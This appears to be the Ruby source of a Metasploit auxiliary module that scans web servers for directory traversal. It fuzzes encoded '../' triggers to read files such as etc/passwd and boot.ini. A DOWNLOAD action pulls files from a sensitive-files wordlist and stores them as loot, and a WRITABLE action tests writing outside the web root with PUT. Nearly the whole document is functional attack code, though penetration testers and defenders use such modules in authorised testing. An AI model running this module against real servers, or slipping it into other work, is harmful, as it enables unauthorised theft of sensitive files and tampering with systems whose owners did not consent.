325 lines
9.4 KiB
Ruby
325 lines
9.4 KiB
Ruby
#
|
|
# Thanks to:
|
|
# ipax, neriberto, flambaz, bperry, egypt, and sinn3r for help
|
|
#
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::WMAPScanUniqueQuery
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Generic HTTP Directory Traversal Utility',
|
|
'Description' => %q{
|
|
This module allows you to test if a web server (or web application) is
|
|
vulnerable to directory traversal with three different actions.
|
|
|
|
The 'CHECK' action (default) is used to automatically (or manually) find if
|
|
directory traversal exists in the web server, and then return the path that
|
|
triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as
|
|
'CHECK', but will take advantage of the found trigger to download files based on
|
|
a 'FILELIST' of your choosing. The 'WRITABLE' action can be used to determine
|
|
if the trigger can be used to write files outside the www directory.
|
|
|
|
To use the 'COOKIE' option, set your value like so: "name=value". To use
|
|
the 'BASICAUTH' option, set it like this: "username:password".
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
|
'm-1-k-3 <michael.messner[at]integralis.com>',
|
|
'et <et[at]cyberspace.org>',
|
|
'sinn3r'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'Actions' =>
|
|
[
|
|
['CHECK', {'Description' => 'Check for basic directory traversal'}],
|
|
['WRITABLE', {'Description' => 'Check if a traversal bug allows us to write anywhere'}],
|
|
['DOWNLOAD', {'Description' => 'Attempt to download files after bruteforcing a trigger'}]
|
|
],
|
|
'DefaultAction' => 'CHECK'
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(80),
|
|
OptEnum.new('METHOD', [true, 'HTTP Request Method', 'GET', ['GET', 'POST', 'HEAD', 'PUT']]),
|
|
OptString.new('PATH', [true, 'Vulnerable path. Ex: /foo/index.php?pg=', '/']),
|
|
OptString.new('DATA', [false,'HTTP body data', '']),
|
|
OptInt.new('DEPTH', [true, 'Traversal depth', 3]),
|
|
OptRegexp.new('PATTERN', [true, 'Regexp pattern to determine directory traversal', '^HTTP/1.1 200 OK']),
|
|
OptPath.new(
|
|
'FILELIST',
|
|
[
|
|
true,
|
|
'Wordlist file to brute force',
|
|
File.join(Msf::Config.install_root, 'data', 'wordlists', 'sensitive_files.txt')
|
|
])
|
|
], self.class)
|
|
|
|
register_advanced_options(
|
|
[
|
|
# We favor automatic
|
|
OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']),
|
|
OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']),
|
|
OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']),
|
|
OptString.new('BASICAUTH', [false, 'Credential to use for basic auth (Ex: admin:admin)', ''])
|
|
], self.class)
|
|
|
|
deregister_options('RHOST')
|
|
end
|
|
|
|
#
|
|
# The fuzz() function serves as the engine for the module. It can intelligently mutate
|
|
# a trigger, and find potential bugs with it.
|
|
#
|
|
def fuzz
|
|
# Possible triggers
|
|
triggers =
|
|
[
|
|
"../", ".../", "..\\", ".\\..\\", "..///", ".\\./", ".//..//",
|
|
".%2e./", "%2e%2e/", "..%5c", "..%2f","..%c0%af.."
|
|
]
|
|
|
|
# Initialize the default file(s) we should try to read during fuzzing
|
|
if datastore['FILE'].empty?
|
|
file_to_read = ['etc/passwd', 'boot.ini']
|
|
else
|
|
file_to_read = [datastore['FILE']]
|
|
end
|
|
|
|
# Each possible trigger, we try to traverse multiple levels down depending
|
|
# on datastore['DEPATH']
|
|
depth = datastore['DEPTH']
|
|
triggers.each do |base|
|
|
1.upto(depth) do |d|
|
|
file_to_read.each do |f|
|
|
trigger = base * d
|
|
req = ini_request(datastore['PATH'] + trigger + f)
|
|
vprint_status("Trying: http://#{rhost}:#{rport}#{req['uri']}")
|
|
res = send_request_cgi(req, 25)
|
|
return trigger if res.to_s =~ datastore['PATTERN']
|
|
end
|
|
end
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
#
|
|
# This method will build the HTTP request based on what the user gives us
|
|
#
|
|
def ini_request(uri)
|
|
req = {}
|
|
|
|
# If the user is using some rare-to-use method, we probably have not fully tested,
|
|
# so we will not support it for now.
|
|
method = datastore['METHOD']
|
|
data = datastore['DATA']
|
|
case method
|
|
when 'GET'
|
|
# Example: Say we have the following datastore['PATH']
|
|
# '/test.php?page=1&id=3¬e=whatever'
|
|
# We expect it to regex the GET parameters:
|
|
# 'page=1&id=3¬e=whatever'
|
|
# And then let queryparse() to handle the rest
|
|
data = uri.match(/\?(\w+=.+&*)$/)
|
|
req['vars_get'] = queryparse(data[1]) if not data.nil?
|
|
when 'POST'
|
|
req['vars_post'] = queryparse(data) if not data.empty?
|
|
when 'PUT'
|
|
req['data'] = data if not data.empty?
|
|
when 'HEAD'
|
|
end
|
|
|
|
req['method'] = datastore['METHOD']
|
|
req['uri'] = uri
|
|
req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty?
|
|
req['data'] = datastore['DATA'] if not datastore['DATA'].empty?
|
|
req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty?
|
|
|
|
return req
|
|
end
|
|
|
|
#
|
|
# Determine if we should automatically fuzz a trigger, or use the user-supplied one
|
|
#
|
|
def ini_trigger
|
|
return datastore['TRIGGER'] if not datastore['TRIGGER'].empty?
|
|
|
|
trigger = fuzz
|
|
if trigger.nil?
|
|
print_error("No trigger found")
|
|
else
|
|
print_good("Found trigger: #{trigger}")
|
|
end
|
|
|
|
return trigger
|
|
end
|
|
|
|
#
|
|
# Action 'CHECK': Find the trigger either automatically using fuzz(), or manually by
|
|
# setting the TRIGGER and FILE option
|
|
#
|
|
def check(trigger)
|
|
if datastore['TRIGGER'].empty?
|
|
# Found trigger using fuzz()
|
|
found = true if trigger
|
|
uri = datastore['PATH'] + trigger
|
|
else
|
|
# Manual check. meh.
|
|
if datastore['FILE'].empty?
|
|
print_error("Must specify a 'FILE' to check manually")
|
|
return
|
|
end
|
|
|
|
uri = datastore['PATH'] + trigger + datastore['FILE']
|
|
req = ini_request(uri)
|
|
vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
|
|
res = send_request_cgi(req, 25)
|
|
found = true if res.to_s =~ datastore['PATTERN']
|
|
end
|
|
|
|
# Reporting
|
|
if found
|
|
print_good("Directory traversal found: #{trigger}")
|
|
|
|
report_web_vuln({
|
|
:host => rhost,
|
|
:port => rport,
|
|
:vhost => datastore['VHOST'],
|
|
:path => uri,
|
|
:params => datastore['PATH'],
|
|
:pname => trigger,
|
|
:risk => 3,
|
|
:proof => trigger,
|
|
:name => self.fullname,
|
|
:category => "web",
|
|
:method => datastore['METHOD']
|
|
})
|
|
|
|
else
|
|
print_error("No directory traversal detected")
|
|
end
|
|
end
|
|
|
|
#
|
|
# Action 'DOWNLOAD': Used to download a file with a directory traversal
|
|
#
|
|
def lfi_download(trigger, files)
|
|
counter = 0
|
|
files.each_line do |f|
|
|
# Our trigger already puts us in '/', so our filename doesn't need to begin with that
|
|
f = f[1,f.length] if f =~ /^\//
|
|
|
|
req = ini_request(uri = (datastore['PATH'] + trigger + f).chop)
|
|
res = send_request_cgi(req, 25)
|
|
|
|
vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
|
|
|
|
# Only download files that are withint our interest
|
|
if res.to_s =~ datastore['PATTERN']
|
|
# We assume the string followed by the last '/' is our file name
|
|
fname = f.split("/")[-1].chop
|
|
loot = store_loot("lfi.data","text/plain",rhost, res.body,fname)
|
|
print_good("File #{fname} downloaded to: #{loot}")
|
|
counter += 1
|
|
end
|
|
end
|
|
print_status("#{counter.to_s} file(s) downloaded")
|
|
end
|
|
|
|
#
|
|
# Action 'WRITABLE': This method will attempt to write to a directory outside of www
|
|
#
|
|
def is_writable(trigger)
|
|
# Modify some registered options for the PUT method
|
|
tmp_method = datastore['METHOD']
|
|
tmp_data = datastore['DATA']
|
|
datastore['METHOD'] = 'PUT'
|
|
|
|
if datastore['DATA'].empty?
|
|
unique_str = Rex::Text.rand_text_alpha(4) * 4
|
|
datastore['DATA'] = unique_str
|
|
else
|
|
unique_str = datastore['DATA']
|
|
end
|
|
|
|
# Form the PUT request
|
|
fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
|
|
uri = datastore['PATH'] + trigger + fname
|
|
vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
|
|
req = ini_request(uri)
|
|
|
|
# Upload our unique string, don't care much about the response
|
|
send_request_cgi(req, 25)
|
|
|
|
# Prepare request to read our file
|
|
datastore['METHOD'] = 'GET'
|
|
datastore['DATA'] = tmp_data
|
|
req = ini_request(uri)
|
|
vprint_status("Verifying upload...")
|
|
res = send_request_cgi(req, 25)
|
|
|
|
# Did we get it?
|
|
if res.body =~ /#{unique_str}/
|
|
print_good("WRITE is possible on #{rhost}:#{rport}")
|
|
else
|
|
print_error("WRITE seems unlikely")
|
|
end
|
|
|
|
# Ah, don't forget to restore our method
|
|
datastore['METHOD'] = tmp_method
|
|
end
|
|
|
|
#
|
|
# Load the whole file list
|
|
# This is used in the lfi_download() function
|
|
#
|
|
def load_filelist
|
|
f = File.open(datastore['FILELIST'], 'rb')
|
|
buf = f.read
|
|
f.close
|
|
return buf
|
|
end
|
|
|
|
def run_host(ip)
|
|
# Make sure datastore['PATH] begins with a '/'
|
|
if datastore['PATH'] !~ /^\//
|
|
datastore['PATH'] = '/' + datastore['PATH']
|
|
end
|
|
|
|
# Some webservers (ie. Apache) might not like the HTTP method to be lower-case
|
|
datastore['METHOD'] = datastore['METHOD'].upcase
|
|
|
|
print_status("Running action: #{action.name}...")
|
|
|
|
# And it's..... "SHOW TIME!!"
|
|
if action.name == 'CHECK'
|
|
trigger = ini_trigger
|
|
return if trigger.nil?
|
|
check(trigger)
|
|
|
|
elsif action.name == 'WRITABLE'
|
|
trigger = ini_trigger
|
|
return if trigger.nil?
|
|
is_writable(trigger)
|
|
|
|
elsif action.name == 'DOWNLOAD'
|
|
trigger = ini_trigger
|
|
return if trigger.nil?
|
|
|
|
# Load up a file list that we wish to download, and then attempt to download them
|
|
# with our directory traversal trigger
|
|
files = load_filelist
|
|
lfi_download(trigger, files)
|
|
end
|
|
end
|
|
end
|